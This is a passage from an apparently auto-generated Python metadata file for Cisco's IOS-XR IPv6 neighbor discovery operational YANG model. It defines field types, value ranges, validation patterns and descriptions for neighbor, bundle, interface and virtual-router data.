''' Dynamic neighbor summary
''',
'dynamic',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('multicast', REFERENCE_CLASS, 'Multicast' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Multicast',
[], [],
''' Multicast neighbor summary
''',
'multicast',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('static', REFERENCE_CLASS, 'Static' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Static',
[], [],
''' Static neighbor summary
''',
'static',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('total-neighbor-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total number of entries
''',
'total_neighbor_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'neighbor-summary',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode.Age' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode.Age',
False,
[
_MetaInfoClassMember('seconds', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Number of seconds
''',
'seconds',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'age',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' The bundle node name
''',
'node_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('age', REFERENCE_CLASS, 'Age' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode.Age',
[], [],
''' Uptime of node (secs)
''',
'age',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('group-id', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Group ID
''',
'group_id',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('process-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' Process Name
''',
'process_name',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('received-packets', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total packet receives
''',
'received_packets',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('received-sequence-number', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Received sequence num
''',
'received_sequence_number',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('sent-packets', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total packet sends
''',
'sent_packets',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('sent-sequence-number', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Sent sequence num
''',
'sent_sequence_number',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('state', REFERENCE_ENUM_CLASS, 'Ipv6NdBndlStateEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdBndlStateEnum',
[], [],
''' State
''',
'state',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('state-changes', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' State changes
''',
'state_changes',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'bundle-node',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleNodes' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleNodes',
False,
[
_MetaInfoClassMember('bundle-node', REFERENCE_LIST, 'BundleNode' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode',
[], [],
''' IPv6 ND operational data for a specific
bundle node
''',
'bundle_node',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'bundle-nodes',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.NdParameters' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.NdParameters',
False,
[
_MetaInfoClassMember('complete-glean-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed GLEAN entry count
''',
'complete_glean_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('complete-protocol-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed PROTO entry Count
''',
'complete_protocol_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dad-attempts', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' DAD attempt count
''',
'dad_attempts',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dropped-glean-req-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Dropped GLEAN entry request count
''',
'dropped_glean_req_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dropped-protocol-req-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Dropped PROTO entry request count
''',
'dropped_protocol_req_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-glean-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Incomplete GLEAN entry count
''',
'incomplete_glean_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-protocol-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Incomplete PROTO entry count
''',
'incomplete_protocol_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-dad-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, DAD (Duplicate Address Detection) is
enabled; otherwise it is disabled
''',
'is_dad_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-dhcp-managed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Flag used for utilising DHCP
''',
'is_dhcp_managed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-icm-pv6-redirect', ATTRIBUTE, 'bool' , None, None,
[], [],
''' ICMP redirect flag
''',
'is_icm_pv6_redirect',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-route-address-managed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Flag used to manage routable address
''',
'is_route_address_managed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-suppressed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Suppress flag
''',
'is_suppressed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-advertisement-lifetime', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement life time in sec
''',
'nd_advertisement_lifetime',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-cache-limit', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed adjacency limit per interface
''',
'nd_cache_limit',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-max-transmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement maximum transmit
interval in sec
''',
'nd_max_transmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-min-transmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement minimum transmit
interval in sec
''',
'nd_min_transmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-reachable-time', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Time to reach ND in msec
''',
'nd_reachable_time',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-retransmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND retransmit interval in msec
''',
'nd_retransmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'nd-parameters',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.LocalAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.LocalAddress',
False,
[
_MetaInfoClassMember('ipv6-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' IPv6 address
''',
'ipv6_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'local-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.GlobalAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.GlobalAddress',
False,
[
_MetaInfoClassMember('ipv6-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' IPv6 address
''',
'ipv6_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'global-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.MemberNode' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.MemberNode',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' Node Name
''',
'node_name',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('total-links', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Number of links on the node
''',
'total_links',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'member-node',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface Name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('etype', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' etype
''',
'etype',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('global-address', REFERENCE_LIST, 'GlobalAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.GlobalAddress',
[], [],
''' List of ND global addresses
''',
'global_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('iftype', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Interface type
''',
'iftype',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-interface-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, interface is enabled
''',
'is_interface_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-ipv6-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, IPv6 is enabled
''',
'is_ipv6_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-mpls-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, MPLS is enabled
''',
'is_mpls_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('local-address', REFERENCE_CLASS, 'LocalAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.LocalAddress',
[], [],
''' Link local address
''',
'local_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('mac-addr', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' MAC address
''',
'mac_addr',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('mac-addr-size', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' MAC address size
''',
'mac_addr_size',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('member-link', REFERENCE_LEAFLIST, 'int' , None, None,
[(0, 4294967295)], [],
''' List of member links
''',
'member_link',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('member-node', REFERENCE_LIST, 'MemberNode' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.MemberNode',
[], [],
''' List of member nodes
''',
'member_node',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('mtu', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' MTU
''',
'mtu',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-parameters', REFERENCE_CLASS, 'NdParameters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.NdParameters',
[], [],
''' ND interface parameters
''',
'nd_parameters',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('parent-interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Parent interface name
''',
'parent_interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('vlan-tag', ATTRIBUTE, 'int' , None, None,
[(0, 65535)], [],
''' vlan tag/id/ucv
''',
'vlan_tag',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'bundle-interface',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces',
False,
[
_MetaInfoClassMember('bundle-interface', REFERENCE_LIST, 'BundleInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface',
[], [],
''' IPv6 ND operational data for a specific
bundle interface
''',
'bundle_interface',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'bundle-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.Interfaces.Interface' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.Interfaces.Interface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface Name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('complete-glean-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed GLEAN entry count
''',
'complete_glean_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('complete-protocol-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed PROTO entry Count
''',
'complete_protocol_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dad-attempts', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' DAD attempt count
''',
'dad_attempts',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dropped-glean-req-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Dropped GLEAN entry request count
''',
'dropped_glean_req_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('dropped-protocol-req-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Dropped PROTO entry request count
''',
'dropped_protocol_req_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-glean-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Incomplete GLEAN entry count
''',
'incomplete_glean_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-protocol-count', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Incomplete PROTO entry count
''',
'incomplete_protocol_count',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-dad-enabled', ATTRIBUTE, 'bool' , None, None,
[], [],
''' If true, DAD (Duplicate Address Detection) is
enabled; otherwise it is disabled
''',
'is_dad_enabled',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-dhcp-managed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Flag used for utilising DHCP
''',
'is_dhcp_managed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-icm-pv6-redirect', ATTRIBUTE, 'bool' , None, None,
[], [],
''' ICMP redirect flag
''',
'is_icm_pv6_redirect',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-route-address-managed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Flag used to manage routable address
''',
'is_route_address_managed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('is-suppressed', ATTRIBUTE, 'bool' , None, None,
[], [],
''' Suppress flag
''',
'is_suppressed',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-advertisement-lifetime', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement life time in sec
''',
'nd_advertisement_lifetime',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-cache-limit', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Completed adjacency limit per interface
''',
'nd_cache_limit',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-max-transmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement maximum transmit
interval in sec
''',
'nd_max_transmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-min-transmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND router advertisement minimum transmit
interval in sec
''',
'nd_min_transmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-reachable-time', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Time to reach ND in msec
''',
'nd_reachable_time',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-retransmit-interval', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' ND retransmit interval in msec
''',
'nd_retransmit_interval',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'interface',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.Interfaces' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.Interfaces',
False,
[
_MetaInfoClassMember('interface', REFERENCE_LIST, 'Interface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.Interfaces.Interface',
[], [],
''' IPv6 node discovery operational data for a
specific node and interface
''',
'interface',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.LocalAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.LocalAddress',
False,
[
_MetaInfoClassMember('ipv6-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' IPv6 address
''',
'ipv6_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'local-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.VrGlobalAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.VrGlobalAddress',
False,
[
_MetaInfoClassMember('ipv6-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' IPv6 address
''',
'ipv6_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'vr-global-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface Name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('context', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Virtual Router ID
''',
'context',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('flags', REFERENCE_ENUM_CLASS, 'Ipv6NdShVrFlagsEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdShVrFlagsEnum',
[], [],
''' VR Flags
''',
'flags',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('link-layer-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Link-Layer Address
''',
'link_layer_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('local-address', REFERENCE_CLASS, 'LocalAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.LocalAddress',
[], [],
''' Link local address
''',
'local_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('state', REFERENCE_ENUM_CLASS, 'Ipv6NdShVrStateEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdShVrStateEnum',
[], [],
''' VR state
''',
'state',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('vr-gl-addr-ct', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Virtual Global Address Count
''',
'vr_gl_addr_ct',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('vr-global-address', REFERENCE_LIST, 'VrGlobalAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.VrGlobalAddress',
[], [],
''' List of ND global addresses
''',
'vr_global_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'nd-virtual-router',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters',
False,
[
